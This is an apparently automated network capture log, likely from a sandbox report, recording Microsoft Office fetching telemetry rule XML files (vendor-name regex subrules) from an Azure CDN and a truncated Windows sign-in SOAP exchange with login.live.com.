                                                                                                                                                      2024-12-04 12:59:10 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      50192.168.2.44981413.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:09 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:10 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 428
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                      ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                      x-ms-request-id: c29bf332-501e-00a0-0ccb-459d9f000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125910Z-1746fd949bddtfvqhC1EWRxbpg000000012000000000ay67
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:10 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      51192.168.2.44981540.126.53.17443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:11 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                      Accept: */*
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                      Content-Length: 3592
                                                                                                                                                      Host: login.live.com
                                                                                                                                                      2024-12-04 12:59:11 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                      2024-12-04 12:59:12 UTC569INHTTP/1.1 200 OK
                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                      Expires: Wed, 04 Dec 2024 12:58:11 GMT
                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                      x-ms-route-info: C543_BAY
                                                                                                                                                      x-ms-request-id: 64cb42a5-6dc7-4a91-bb9c-efb9c1bf3c0e
                                                                                                                                                      PPServer: PPV: 30 H: PH1PEPF0001B6F6 V: 0
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:11 GMT
                                                                                                                                                      Connection: close
                                                                                                                                                      Content-Length: 11390
                                                                                                                                                      2024-12-04 12:59:12 UTC11390INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      52192.168.2.44981613.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:11 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:12 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 499
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                      ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                      x-ms-request-id: 167d53f1-601e-0084-47cc-456b3f000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125912Z-1746fd949bdkw94lhC1EWRxuz400000001f0000000002vnx
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:12 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      53192.168.2.44981713.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:11 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:12 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 415
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                      ETag: "0x8DC582B988EBD12"
                                                                                                                                                      x-ms-request-id: e4103400-101e-008e-08d4-45cf88000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125912Z-1746fd949bd77mkmhC1EWR5efc00000001g0000000007akp
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:12 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      54192.168.2.44981813.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:11 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:12 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 471
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                      ETag: "0x8DC582BB5815C4C"
                                                                                                                                                      x-ms-request-id: daea1f5e-401e-005b-68d1-459c0c000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125912Z-1746fd949bdjrnwqhC1EWRpg28000000017g000000009bfu
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:12 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      55192.168.2.44981913.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:11 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:12 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 419
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                      ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                      x-ms-request-id: 490c4061-c01e-000b-75c3-45e255000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125912Z-1746fd949bd4w8sthC1EWR700400000000yg000000008cdx
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:12 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      56192.168.2.44982013.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:12 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:12 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 494
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                      ETag: "0x8DC582BB8972972"
                                                                                                                                                      x-ms-request-id: 8c022bf0-601e-0070-5bcb-45a0c9000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125912Z-1746fd949bdb8xvchC1EWRmbd40000000190000000000r56
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:12 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      57192.168.2.44982113.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:13 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:14 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 420
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                      ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                      x-ms-request-id: de9014ac-301e-0051-7cc5-4538bb000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125914Z-1746fd949bdjzh7thC1EWR3g6400000001a0000000005880
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:14 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      58192.168.2.44982213.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:13 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:14 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 472
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                      ETag: "0x8DC582B9D43097E"
                                                                                                                                                      x-ms-request-id: 4626c155-d01e-0017-0ecc-45b035000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125914Z-1746fd949bdhk6hphC1EWRaw3c00000001000000000075ua
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
